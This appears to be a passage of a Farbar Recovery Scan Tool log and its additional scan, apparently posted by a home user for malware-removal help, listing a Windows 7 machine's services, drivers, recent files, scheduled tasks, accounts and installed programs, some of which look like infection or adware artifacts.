S2 mccspsvc; "C:\Program Files\Common Files\McAfee\CSP\2.3.253.0\\McCSPServiceHost.exe" [X]
S3 mfefire; "C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe" [X]
S2 mfemms; "C:\Program Files\Common Files\McAfee\SystemCore\\mfemms.exe" [X]
S2 ModuleCoreService; "C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe" [X]
S2 MsF928BDEEApp; C:\Windows\System32\MsF928BDEEApp.dll [X]
S2 mssecsvc2.0; C:\WINDOWS\mssecsvc.exe -m security [X]
S2 mssecsvc2.1; C:\WINDOWS\mssecsvr.exe -m security [X]
S2 PEFService; "C:\Program Files\Common Files\Intel Security\PEF\CORE\PEFService.exe" [X]
 
===================== Drivers (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 cfwids; C:\Windows\System32\drivers\cfwids.sys [88456 2016-11-18] (McAfee, Inc. -> McAfee, Inc.)
S3 HipShieldK; C:\Windows\System32\drivers\HipShieldK.sys [216704 2016-08-02] (McAfee, Inc. -> McAfee, Inc.)
R2 McPvDrv; C:\Windows\system32\drivers\McPvDrv.sys [87928 2016-08-01] (McAfee, Inc. -> McAfee, Inc.)
R3 mfeaack; C:\Windows\System32\drivers\mfeaack.sys [484576 2016-11-18] (McAfee, Inc. -> McAfee, Inc.)
R3 mfeavfk; C:\Windows\System32\drivers\mfeavfk.sys [366320 2016-11-18] (McAfee, Inc. -> McAfee, Inc.)
R3 mfefirek; C:\Windows\System32\drivers\mfefirek.sys [518184 2016-11-18] (McAfee, Inc. -> McAfee, Inc.)
R0 mfehidk; C:\Windows\System32\drivers\mfehidk.sys [916432 2016-11-18] (McAfee, Inc. -> McAfee, Inc.)
R3 mfencbdc; C:\Windows\System32\DRIVERS\mfencbdc.sys [498152 2016-10-24] (McAfee, Inc. -> McAfee, Inc.)
S3 mfencrk; C:\Windows\System32\DRIVERS\mfencrk.sys [109336 2016-10-24] (McAfee, Inc. -> McAfee, Inc.)
R3 mfeplk; C:\Windows\System32\drivers\mfeplk.sys [110248 2016-11-18] (McAfee, Inc. -> McAfee, Inc.)
R0 mfewfpk; C:\Windows\System32\drivers\mfewfpk.sys [254800 2016-11-18] (McAfee, Inc. -> McAfee, Inc.)
S3 SrvHsfHDA; C:\Windows\System32\DRIVERS\VSTAZL6.SYS [292864 2009-06-10] (Microsoft Windows -> Conexant Systems, Inc.)
S3 SrvHsfV92; C:\Windows\System32\DRIVERS\VSTDPV6.SYS [1485312 2009-06-10] (Microsoft Windows -> Conexant Systems, Inc.)
S3 SrvHsfWinac; C:\Windows\System32\DRIVERS\VSTCNXT6.SYS [740864 2009-06-10] (Microsoft Windows -> Conexant Systems, Inc.)
S3 SWDUMon; C:\Windows\System32\DRIVERS\SWDUMon.sys [13920 2017-01-26] (SlimWare Utilities Inc. -> )
S3 USBAAPL64; C:\Windows\System32\Drivers\usbaapl64.sys [52736 2012-07-09] (Microsoft Windows Hardware Compatibility Publisher -> Apple, Inc.)
S3 MBAMSwissArmy; \??\C:\Windows\system32\drivers\MBAMSwissArmy.sys [X]
S3 vzandnetdiag; system32\DRIVERS\lgvzandnetdiag64.sys [X]
S3 vzandnetdiag2; system32\DRIVERS\lgvzandnetdiag264.sys [X]
S3 vzandnetmodem; system32\DRIVERS\lgvzandnetmdm64.sys [X]
S3 vzandnetndis; system32\DRIVERS\lgvzandnetndis64.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
NETSVC: MsF928BDEEApp -> C:\Windows\System32\MsF928BDEEApp.dll ==> No File
 
==================== One month (created) (Whitelisted) =========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2022-03-28 11:35 - 2022-03-28 11:36 - 000042658 _____ C:\Users\Marilyn\Desktop\FRST.txt
2022-03-28 11:32 - 2022-03-28 11:36 - 000000000 ____D C:\FRST
2022-03-28 11:26 - 2022-03-28 11:15 - 202117816 _____ (Malwarebytes) C:\Users\Marilyn\Desktop\MBSetup-0076911.0076911-4.5.2.157.exe
2022-03-28 11:03 - 2022-03-28 11:14 - 000000000 ____D C:\Program Files\Malwarebytes
2022-03-28 10:57 - 2022-03-28 11:02 - 000000000 ____D C:\Users\Marilyn\Desktop\Malware Bytes Anti Malware
2022-03-28 10:57 - 2022-03-28 10:55 - 002365440 _____ (Farbar) C:\Users\Marilyn\Desktop\FRST64.exe
2022-03-28 10:57 - 2020-01-24 21:57 - 001924728 _____ (Malwarebytes) C:\Users\Marilyn\Desktop\XXetup.exe
2022-03-28 10:48 - 2022-03-28 10:49 - 000000000 ____D C:\AdwCleaner
2022-03-28 10:48 - 2022-03-28 10:45 - 008540344 _____ (Malwarebytes) C:\Users\Marilyn\Desktop\adwcleaner_8.3.1.exe
2022-03-28 10:29 - 2022-03-28 11:13 - 000000075 _____ C:\Windows\system32\p
2022-03-28 09:48 - 2022-03-28 11:14 - 000003420 _____ C:\Windows\system32\Tasks\Mysa2
2022-03-27 16:18 - 2022-03-27 16:18 - 000000000 ____D C:\Quarantine
2022-03-27 15:13 - 2022-03-28 10:59 - 000000000 ____D C:\Users\Marilyn\AppData\Local\Everything
2022-03-27 13:27 - 2022-03-28 10:59 - 000000000 ____D C:\Users\Marilyn\AppData\Roaming\Everything
2022-03-27 13:27 - 2022-03-27 13:27 - 000000953 _____ C:\Users\Marilyn\Desktop\Search Everything.lnk
2022-03-27 13:27 - 2022-03-27 13:27 - 000000000 ____D C:\Users\Marilyn\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Everything
2022-03-27 13:27 - 2022-03-27 13:27 - 000000000 ____D C:\Program Files\Everything
2022-03-27 12:51 - 2022-03-27 12:51 - 000000207 _____ C:\Windows\tweaking.com-regbackup-MARILYN-HP-Windows-7-Home-Premium-(64-bit).dat
2022-03-27 12:51 - 2022-03-27 12:51 - 000000000 ____D C:\RegBackup
2022-03-27 12:48 - 2022-03-27 12:48 - 000002123 _____ C:\Users\Marilyn\Desktop\Tweaking.com - Windows Repair.lnk
2022-03-27 12:48 - 2022-03-27 12:48 - 000000574 _____ C:\Windows\Tasks\Tweaking.com - Windows Repair Tray Icon.job
2022-03-27 12:48 - 2022-03-27 12:48 - 000000000 ____D C:\Users\Marilyn\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Tweaking.com
2022-03-27 12:48 - 2022-03-27 12:48 - 000000000 ____D C:\Program Files (x86)\Tweaking.com
2022-03-27 12:47 - 2022-03-27 12:48 - 000389123 _____ C:\Windows\Tweaking.com - Windows Repair Setup Log.txt
2022-03-27 12:47 - 2022-03-27 12:42 - 055490688 _____ (Tweaking.com) C:\Users\Marilyn\Desktop\tweaking.com_windows_repair_aio_setup4.12.4.exe
2022-03-25 16:32 - 2022-03-26 14:59 - 000000000 ____D C:\EEK
2022-03-25 16:31 - 2022-03-27 22:13 - 000000000 ____D C:\KVRT2020_Data
2022-03-25 12:42 - 2022-03-28 11:01 - 000998064 _____ C:\Windows\ntbtlog.txt
2022-03-25 12:33 - 2022-03-25 12:33 - 000000000 ____D C:\Users\Marilyn\Desktop\Microsoft Offline Safety Scanner
2022-03-25 12:10 - 2022-03-25 12:10 - 000002816 _____ C:\Windows\system32\Tasks\CCleanerSkipUAC - Marilyn
2022-03-25 12:09 - 2022-03-28 11:16 - 000000000 ____D C:\Program Files\CCleaner
2022-03-25 12:09 - 2022-03-25 12:09 - 037889344 _____ (Piriform Software Ltd) C:\Users\Marilyn\Downloads\ccsetup591.exe
2022-03-25 12:09 - 2022-03-25 12:09 - 000003870 _____ C:\Windows\system32\Tasks\CCleaner Update
2022-03-25 12:09 - 2022-03-25 12:09 - 000000782 _____ C:\Users\Public\Desktop\CCleaner.lnk
2022-03-25 12:09 - 2022-03-25 12:09 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2022-03-24 11:39 - 2022-03-24 11:36 - 004146112 _____ (AVG Technologies CZ, s.r.o.) C:\Windows\system32\avgremoverx.exe
2022-03-24 09:51 - 2022-03-28 11:29 - 000000000 ____D C:\Users\Marilyn\AppData\LocalLow\Mozilla
2022-03-24 09:51 - 2022-03-28 10:55 - 000000000 ____D C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38
2022-03-24 09:51 - 2022-03-26 13:23 - 000000000 ____D C:\Program Files\Mozilla Firefox
2022-03-24 09:51 - 2022-03-24 09:51 - 000000936 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2022-03-24 09:51 - 2022-03-24 09:51 - 000000924 _____ C:\Users\Public\Desktop\Firefox.lnk
2022-03-24 09:51 - 2022-03-24 09:51 - 000000000 ____D C:\Windows\system32\Tasks\Mozilla
2022-03-24 09:51 - 2022-03-24 09:51 - 000000000 ____D C:\Users\Marilyn\AppData\Local\Mozilla
2022-03-24 09:51 - 2022-03-24 09:51 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2022-03-24 09:02 - 2022-03-24 09:02 - 000000000 _____ C:\Users\Marilyn\AppData\Local\{34ACB9DF-E53F-41D3-8944-3B60681EB5DC}
2022-03-22 13:57 - 2022-03-24 10:52 - 000007604 _____ C:\Users\Marilyn\AppData\Local\Resmon.ResmonCfg
2022-03-22 11:46 - 2022-03-22 11:49 - 000000000 ____D C:\Users\Marilyn\AppData\Roaming\Geek Uninstaller
2022-03-17 10:36 - 2022-03-17 10:36 - 000000000 ____D C:\Users\Guest\AppData\Local\McAfee File Lock
2022-03-17 09:51 - 2022-03-17 09:51 - 000113928 _____ C:\Users\Guest\AppData\Local\GDIPFONTCACHEV1.DAT
2022-03-17 09:47 - 2022-03-17 10:02 - 000000000 ____D C:\Users\Guest\AppData\Local\Backup Assistant Plus
2022-03-08 08:38 - 2022-03-22 11:16 - 000000000 ____D C:\Windows\pss
2022-03-02 19:47 - 2022-03-28 11:14 - 000003330 _____ C:\Windows\system32\Tasks\MicrosoftsWindowsy
2022-02-27 12:39 - 2022-02-27 12:44 - 002998689 _____ C:\Users\Marilyn\Desktop\tAX_1.heic
 
==================== One month (modified) ==================
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2022-03-28 11:36 - 2021-11-22 12:27 - 000188308 _____ C:\Windows\system32\prfh0814.dat
2022-03-28 11:27 - 2010-11-27 18:29 - 000113928 _____ C:\Users\Marilyn\AppData\Local\GDIPFONTCACHEV1.DAT
2022-03-28 11:23 - 2009-07-14 01:13 - 000772352 _____ C:\Windows\system32\PerfStringBackup.INI
2022-03-28 11:23 - 2009-07-13 23:20 - 000000000 ____D C:\Windows\inf
2022-03-28 11:18 - 2021-10-04 20:06 - 000024630 _____ C:\Users\Public\service.txt
2022-03-28 11:18 - 2021-10-04 20:05 - 000009572 _____ C:\Users\Public\processa.txt
2022-03-28 11:18 - 2021-10-04 20:05 - 000002952 _____ C:\Users\Public\datea.txt
2022-03-28 11:18 - 2009-07-14 00:45 - 000023248 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2022-03-28 11:18 - 2009-07-14 00:45 - 000023248 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2022-03-28 11:14 - 2021-10-04 20:05 - 000003448 _____ C:\Windows\system32\Tasks\Mysa1
2022-03-28 11:14 - 2021-10-04 20:05 - 000003444 _____ C:\Windows\system32\Tasks\ok
2022-03-28 11:14 - 2021-10-04 20:05 - 000003342 _____ C:\Windows\system32\Tasks\oka
2022-03-28 11:14 - 2012-11-24 12:03 - 000000000 ____D C:\ProgramData\Malwarebytes
2022-03-28 11:13 - 2014-03-22 13:47 - 000001580 _____ C:\Windows\Tasks\Information-updater.job
2022-03-28 11:13 - 2014-03-22 13:47 - 000001536 _____ C:\Windows\Tasks\Information-codedownloader.job
2022-03-28 11:13 - 2014-03-22 13:47 - 000001414 _____ C:\Windows\Tasks\Information-enabler.job
2022-03-28 11:13 - 2014-03-22 13:30 - 000003096 _____ C:\Windows\Tasks\Information-chromeinstaller.job
2022-03-28 11:13 - 2014-03-22 13:30 - 000002340 _____ C:\Windows\Tasks\Information-firefoxinstaller.job
2022-03-28 11:13 - 2014-03-22 12:53 - 000000300 _____ C:\Windows\Tasks\MySearchDial.job
2022-03-28 11:13 - 2013-06-03 20:52 - 000000350 _____ C:\Windows\Tasks\AVG-Secure-Search-Update_JUNE2013_TB_rmv.job
2022-03-28 11:13 - 2009-07-14 01:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2022-03-28 10:41 - 2017-01-03 10:59 - 000000414 _____ C:\Windows\Tasks\HP Photo Creations Communicator.job
2022-03-28 00:02 - 2014-03-22 13:29 - 000000000 ____D C:\Program Files (x86)\Information
2022-03-27 23:53 - 2012-01-29 15:39 - 000000000 ____D C:\Program Files (x86)\Coupons
2022-03-27 23:05 - 2016-11-07 15:30 - 000000000 ____D C:\ProgramData\Essentware
2022-03-27 19:56 - 2010-12-06 10:58 - 000003942 _____ C:\Windows\system32\Tasks\User_Feed_Synchronization-{AB8AAEEB-E020-4223-9761-6466B42DE5D3}
2022-03-27 15:06 - 2022-02-09 10:33 - 000000340 _____ C:\Windows\Tasks\HPCeeScheduleForMarilyn.job
2022-03-27 15:06 - 2016-11-12 15:28 - 000000370 _____ C:\Windows\Tasks\SlimCleaner Plus (Scheduled Scan - Marilyn).job
2022-03-27 13:09 - 2016-11-07 15:31 - 000000258 __RSH C:\ProgramData\ntuser.pol
2022-03-27 13:09 - 2009-07-14 00:45 - 000422688 _____ C:\Windows\system32\FNTCACHE.DAT
2022-03-27 13:04 - 2018-03-26 20:08 - 000000000 ____D C:\Users\Marilyn\Downloads\- ma caregiver affidavit form(1).pdf_files
2022-03-27 13:04 - 2009-07-13 22:34 - 000000616 _____ C:\Windows\win.ini
2022-03-27 13:01 - 2016-12-18 20:13 - 000782336 _____ C:\Windows\SysWOW64\PerfStringBackup.INI
2022-03-26 15:25 - 2009-07-13 22:34 - 000000062 _____ C:\Windows\system32\Drivers\etc\hosts_bak_383
2022-03-26 13:26 - 2014-01-25 11:40 - 000000000 ____D C:\found.000
2022-03-25 12:19 - 2012-11-26 12:51 - 000000000 ____D C:\ProgramData\LogMeIn
2022-03-25 12:19 - 2009-09-06 21:57 - 000000000 ____D C:\Windows\Panther
2022-03-25 12:18 - 2014-12-02 22:17 - 000000000 ____D C:\Windows\Minidump
2022-03-25 12:18 - 2011-05-07 11:12 - 000000000 ____D C:\Users\Marilyn\AppData\Local\CrashDumps
2022-03-24 11:27 - 2012-11-26 12:13 - 000000000 ____D C:\Users\Marilyn\AppData\Local\ElevatedDiagnostics
2022-03-24 09:51 - 2017-03-29 10:21 - 000000000 ____D C:\Users\Marilyn\AppData\Roaming\Mozilla
2022-03-24 09:49 - 2011-08-22 18:44 - 000000000 ____D C:\Users\Marilyn\AppData\Local\Google
2022-03-24 09:49 - 2011-08-22 18:44 - 000000000 ____D C:\Program Files (x86)\Google
2022-03-24 09:49 - 2010-11-28 12:44 - 000000000 ____D C:\Users\Marilyn\AppData\Roaming\Adobe
2022-03-22 16:09 - 2011-08-22 18:44 - 000000000 ____D C:\Program Files\Google
2022-03-22 14:55 - 2022-02-09 10:33 - 000003194 _____ C:\Windows\system32\Tasks\HPCeeScheduleForMarilyn
2022-03-22 13:52 - 2011-11-29 10:58 - 000000000 ____D C:\Windows\system32\Macromed
2022-03-22 13:50 - 2010-07-10 22:29 - 000000000 ____D C:\Windows\SysWOW64\Macromed
2022-03-22 13:48 - 2010-07-11 00:02 - 000000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HP
2022-03-22 13:48 - 2010-07-10 22:01 - 000000000 ____D C:\Program Files\Hewlett-Packard
2022-03-22 13:46 - 2012-01-29 15:38 - 000000000 ____D C:\Program Files (x86)\HP
2022-03-22 13:46 - 2010-07-10 22:01 - 000000000 ____D C:\Program Files (x86)\Hewlett-Packard
2022-03-22 13:44 - 2010-07-10 22:03 - 000000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2022-03-22 13:42 - 2010-07-08 04:43 - 000000000 ____D C:\ProgramData\WildTangent
2022-03-22 13:42 - 2009-07-14 01:32 - 000000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2022-03-22 12:43 - 2012-01-29 15:38 - 000000000 ____D C:\ProgramData\HP
2022-03-22 12:37 - 2012-01-29 15:37 - 000000000 ____D C:\Program Files\HP
2022-03-22 10:37 - 2013-04-29 09:52 - 000000000 ____D C:\Users\Marilyn\AppData\Local\Backup Assistant Plus
2022-03-08 08:52 - 2009-07-13 23:20 - 000000000 ____D C:\Windows\system32\NDF
2022-03-06 18:32 - 2010-11-27 18:38 - 000000000 ____D C:\Users\Marilyn\AppData\Local\Hewlett-Packard
 
==================== Files in the root of some directories ========
 
2014-08-18 09:25 - 2014-08-18 09:25 - 000000004 _____ () C:\Users\Marilyn\AppData\Roaming\2873252659
2014-08-18 09:25 - 2014-08-18 09:26 - 003133211 _____ () C:\Users\Marilyn\AppData\Roaming\3104970040
2013-12-09 18:41 - 2013-12-09 18:41 - 004889600 _____ () C:\Users\Marilyn\AppData\Roaming\IHAMC.msi
2014-03-22 13:53 - 2014-07-19 09:20 - 000000088 _____ () C:\Users\Marilyn\AppData\Roaming\WB.CFG
2013-05-03 21:28 - 2013-05-03 21:28 - 000003584 _____ () C:\Users\Marilyn\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2018-12-31 11:10 - 2018-12-31 11:10 - 000000542 _____ () C:\Users\Marilyn\AppData\Local\LMIR088D0001.tmp_r.bat
2022-03-22 13:57 - 2022-03-24 10:52 - 000007604 _____ () C:\Users\Marilyn\AppData\Local\Resmon.ResmonCfg
2022-03-24 09:02 - 2022-03-24 09:02 - 000000000 _____ () C:\Users\Marilyn\AppData\Local\{34ACB9DF-E53F-41D3-8944-3B60681EB5DC}
2021-10-04 18:57 - 2021-10-04 18:57 - 000000000 _____ () C:\Users\Marilyn\AppData\Local\{DAD70E7C-C7B4-47F7-87CE-76E4F783B327}
 
==================== SigCheck ============================
 
(There is no automatic fix for files that do not pass verification.)
 
==================== End of FRST.txt ========================
 
Addition.txt
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 28-03-2022
Ran by Marilyn (28-03-2022 11:37:33)
Running from C:\Users\Marilyn\Desktop
Microsoft Windows 7 Home Premium  Service Pack 1 (X64) (2010-11-27 22:03:47)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
 
(If an entry is included in the fixlist, it will be removed.)
 
Administrator (S-1-5-21-1250379553-2428740185-3603661230-500 - Administrator - Disabled)
Guest (S-1-5-21-1250379553-2428740185-3603661230-501 - Limited - Enabled) => C:\Users\Guest
HomeGroupUser$ (S-1-5-21-1250379553-2428740185-3603661230-1002 - Limited - Enabled)
Jay (S-1-5-21-1250379553-2428740185-3603661230-1004 - Limited - Enabled) => C:\Users\Jay
Marilyn (S-1-5-21-1250379553-2428740185-3603661230-1000 - Administrator - Enabled) => C:\Users\Marilyn
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
Acrobat.com (HKLM-x32\...\{287ECFA4-719A-2143-A09B-D6A12DE54E40}) (Version: 1.6.65 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 1.5.0.7220 - Adobe Systems Inc.)
Adobe Reader 9.5.5 MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-A91000000001}) (Version: 9.5.5 - Adobe Systems Incorporated)
Adobe Shockwave Player 11.5 (HKLM-x32\...\{9ECF7817-DB11-4FBA-9DF1-296A578D513A}) (Version: 11.5.7.609 - Adobe Systems, Inc)
Apple Application Support (HKLM-x32\...\{46F044A5-CE8B-4196-984E-5BD6525E361D}) (Version: 2.3.6 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{7446FE8D-C1F9-4D42-AAAE-5DBCE58605A6}) (Version: 6.0.0.59 - Apple Inc.)
Ask Toolbar Updater (HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\...\{79A765E1-C399-405B-85AF-466F52E918B0}) (Version: 1.2.5.36191 - Ask.com) <==== ATTENTION
Ask Toolbar Updater (HKU\S-1-5-21-1250379553-2428740185-3603661230-501\...\{79A765E1-C399-405B-85AF-466F52E918B0}) (Version: 1.2.1.22229 - Ask.com) <==== ATTENTION
Bing Rewards Client Installer (HKLM-x32\...\{61EDBE71-5D3E-4AB7-AD95-E53FEAF68C17}) (Version: 16.0.345.0 - Microsoft Corporation) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 5.91 - Piriform)
CinemaNow Media Manager (HKLM-x32\...\{6C122441-1861-4CD7-B1C5-A163A6984E12}) (Version: 1.9.1.105 - CinemaNow, Inc.)
Coupon Printer for Windows (HKLM-x32\...\Coupon Printer for Windows5.0.0.0) (Version: 5.0.0.0 - Coupons.com Incorporated)
CyberLink DVD Suite (HKLM-x32\...\InstallShield_{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}) (Version: 7.0.3003 - CyberLink Corp.)
CyberLink MediaShow (HKLM-x32\...\InstallShield_{80E158EA-7181-40FE-A701-301CE6BE64AB}) (Version: 5.0.1616 - CyberLink Corp.)
CyberLink PowerDVD 9 (HKLM-x32\...\InstallShield_{A8516AC9-AAF1-47F9-9766-03E2D4CDBCF8}) (Version: 9.0.1.4217 - CyberLink Corp.)
CyberLink YouCam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 3.0.2511 - CyberLink Corp.)
Energy Star Digital Logo (HKLM-x32\...\{BD1A34C9-4764-4F79-AE1F-112F8C89D3D4}) (Version: 1.0.1 - Hewlett-Packard)
ESU for Microsoft Windows 7 (HKLM-x32\...\{3877C901-7B90-4727-A639-B6ED2DD59D43}) (Version: 1.0.0 - Hewlett-Packard)
Everything 1.4.1.935 (x64) (HKLM\...\Everything) (Version: 1.4.1.935 - David Carpenter)
Google Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.25.11 - Google Inc.) Hidden
HP MediaSmart CinemaNow 2.0 (HKLM-x32\...\{9008D736-35CA-40DB-A2BE-5F32D954E5AA}) (Version: 2.0 - Hewlett-Packard)
HP Photo Creations (HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\...\HP Photo Creations) (Version: 1.0.0.22192 - HP)
HP Photo Creations (HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\...\HP Photo Creations) (Version: 1.0.0.22192 - HP)
HP Photo Creations (HKU\S-1-5-21-1250379553-2428740185-3603661230-501\...\HP Photo Creations) (Version: 1.0.0.22192 - HP)
HP Power Manager (HKLM-x32\...\{4B156358-CE9C-4E9F-8CAD-79AE86A68C60}) (Version: 1.0.3 - Hewlett-Packard Company)
Intel® Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1007 - Intel Corporation)
Intel® Graphics Media Accelerator Driver (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2086 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 9.6.2.1001 - Intel Corporation)
Java 7 Update 51 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217021FF}) (Version: 7.0.510 - Oracle)
Junk Mail filter update (HKLM-x32\...\{8E5233E1-7495-44FB-8DEB-4BE906D59619}) (Version: 14.0.8117.416 - Microsoft Corporation) Hidden
LabelPrint (HKLM-x32\...\{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.2907 - CyberLink Corp.) Hidden
LabelPrint (HKLM-x32\...\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.2907 - CyberLink Corp.)
Microsoft .NET Framework 4.5 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50709 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM-x32\...\{90120000-0011-0000-0000-0000000FF1CE}_PROPLUS_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Professional Plus 2007 (HKLM-x32\...\PROPLUS) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.10411.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM-x32\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x64 9.0.30729.5570 (HKLM\...\{8338783A-0968-3B85-AFC7-BAAE0A63DC50}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM-x32\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022.218 (HKLM-x32\...\{E503B4BF-F7BB-3D5F-8BC8-F694B1CFF942}) (Version: 9.0.21022.218 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.40820 - Microsoft Corporation)
Mozilla Firefox (x64 en-US) (HKLM\...\Mozilla Firefox 98.0.2 (x64 en-US)) (Version: 98.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 98.0.2 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
PhotoNow! (HKLM-x32\...\{D36DD326-7280-11D8-97C8-000129760CBE}) (Version: 1.1.6904 - CyberLink Corp.) Hidden
PhotoNow! (HKLM-x32\...\InstallShield_{D36DD326-7280-11D8-97C8-000129760CBE}) (Version: 1.1.6904 - CyberLink Corp.)
Power2Go (HKLM-x32\...\{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 6.1.4204 - CyberLink Corp.) Hidden
Power2Go (HKLM-x32\...\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 6.1.4204 - CyberLink Corp.)
PowerDirector (HKLM-x32\...\{CB099890-1D5F-11D5-9EA9-0050BAE317E1}) (Version: 8.0.3003 - CyberLink Corp.) Hidden
PowerDirector (HKLM-x32\...\InstallShield_{CB099890-1D5F-11D5-9EA9-0050BAE317E1}) (Version: 8.0.3003 - CyberLink Corp.)
